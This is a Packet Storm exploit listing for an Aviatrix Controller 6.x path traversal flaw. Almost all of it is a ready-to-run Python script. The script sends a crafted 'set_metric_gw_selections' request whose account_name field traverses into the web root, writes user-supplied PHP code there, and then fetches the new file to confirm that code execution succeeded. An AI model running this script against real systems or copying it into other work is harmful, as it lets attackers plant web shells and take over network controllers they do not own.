Lucene search

K
packetstorm0xJoyGhoshPACKETSTORM:164461
HistoryOct 11, 2021 - 12:00 a.m.

Aviatrix Controller 6.x Path Traversal / Code Execution

2021-10-1100:00:00
0xJoyGhosh
packetstormsecurity.com
314
`#!/usr/bin/env python3  
import requests  
from requests.structures import CaseInsensitiveDict  
from colorama import Fore, Style  
import argparse  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
print(f"""  
  
β–‘β–ˆβ–€β–€β–ˆ β–‘β–ˆβ”€β”€β–‘β–ˆ β–‘β–ˆβ–€β–€β–€ ── β–ˆβ–€β–ˆ β–ˆβ–€β–€β–ˆ β–ˆβ–€β–ˆ β–„β–ˆβ”€ ── β”€β–ˆβ–€β–ˆβ”€ β–ˆβ–€β–€β–ˆ β–„β–€β–€β–„ β–„β–€β–€β–„ β–ˆβ–€β–€β–ˆ  
β–‘β–ˆβ”€β”€β”€ β”€β–‘β–ˆβ–‘β–ˆβ”€ β–‘β–ˆβ–€β–€β–€ β–€β–€ ─▄▀ β–ˆβ–„β–€β–ˆ ─▄▀ β”€β–ˆβ”€ β–€β–€ β–ˆβ–„β–„β–ˆβ–„ β–ˆβ–„β–€β–ˆ β–„β–€β–€β–„ β–ˆβ–„β–„β”€ β–ˆβ–„β–€β–ˆ  
β–‘β–ˆβ–„β–„β–ˆ ──▀▄▀─ β–‘β–ˆβ–„β–„β–„ ── β–ˆβ–„β–„ β–ˆβ–„β–„β–ˆ β–ˆβ–„β–„ β–„β–ˆβ–„ ── β”€β”€β”€β–ˆβ”€ β–ˆβ–„β–„β–ˆ β–€β–„β–„β–€ β–€β–„β–„β–€ β–ˆβ–„β–„β–ˆ  
Author : 0xJoyGhosh  
Org : System00 Security  
Twitter: @0xjoyghosh  
  
""")  
try:  
parser = argparse.ArgumentParser()  
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)  
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)  
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)  
args = parser.parse_args()  
url =f"{args.url}/v1/backend1"  
except TypeError:  
print("Type -h To See all the options")  
except():  
exit()  
def exploit(url,path,code):  
headers = CaseInsensitiveDict()  
headers["Content-Type"] = "application/x-www-form-urlencoded"  
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'  
resp = requests.post(url, headers=headers, data=data,verify=False)  
stat = requests.get(f"{args.url}/v1/{path}",verify=False)  
if resp.status_code==200:  
if stat.status_code==200:  
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")  
print("")  
else:  
print("[ Exploit successful Creating File Failed ]")  
pass  
else:  
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')  
  
if args.url is not None:  
if args.code is not None:  
if args.name is not None:  
exploit(url,args.name,args.code)  
else:  
print('Type -h to see help Menu')  
else:  
print('Type -h to see help Menu')  
else:  
print('Type -h to see help Menu')  
`
Related for PACKETSTORM:164461